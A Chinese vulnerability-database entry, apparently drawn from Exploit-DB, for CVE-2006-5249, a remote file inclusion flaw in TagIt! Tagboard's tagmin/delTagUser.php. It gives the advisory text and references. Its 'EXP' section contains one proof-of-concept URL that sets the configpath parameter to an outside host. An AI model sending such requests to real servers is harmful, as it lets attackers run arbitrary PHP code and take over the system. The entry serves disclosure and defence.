TagIt! Tagboard Tagit2b 'tagmin/delTagUser.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111225 漏洞类型 输入验证
发布时间 2006-10-10 更新时间 2006-10-19
CVE编号 CVE-2006-5249 CNNVD-ID CNNVD-200610-179
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28782
https://cxsecurity.com/issue/WLB-2006100078
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-179
|漏洞详情
TagIt!Tagboard2.1.BBuild2(tagit2b)的tagmin/delTagUser.php中的PHP远程文件包含漏洞,远程攻击者可以通过configpath参数中的URL来执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20451/info

Tagit2b is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data.

An attacker can exploit this issue to have malicious PHP code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Version 2.1.B Build 2 is affected by this issue; other versions may also be affected.

http://www.example.com/tagit2b/tagmin/delTagUser.php?configpath=http://www.example.com
|参考资料

来源:BUGTRAQ
名称:20061010tagit2b--RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/448173/100/0/threaded
来源:VIM
名称:20061011SourceVERIFYoftagit2bdelTagUser.phpRFI
链接:http://www.attrition.org/pipermail/vim/2006-October/001083.html
来源:SECTRACK
名称:1017045
链接:http://securitytracker.com/id?1017045
来源:XF
名称:tagit-deltaguser-file-include(29430)
链接:http://xforce.iss.net/xforce/xfdb/29430
来源:BID
名称:20451
链接:http://www.securityfocus.com/bid/20451
来源:SREASON
名称:1714
链接:http://securityreason.com/securityalert/1714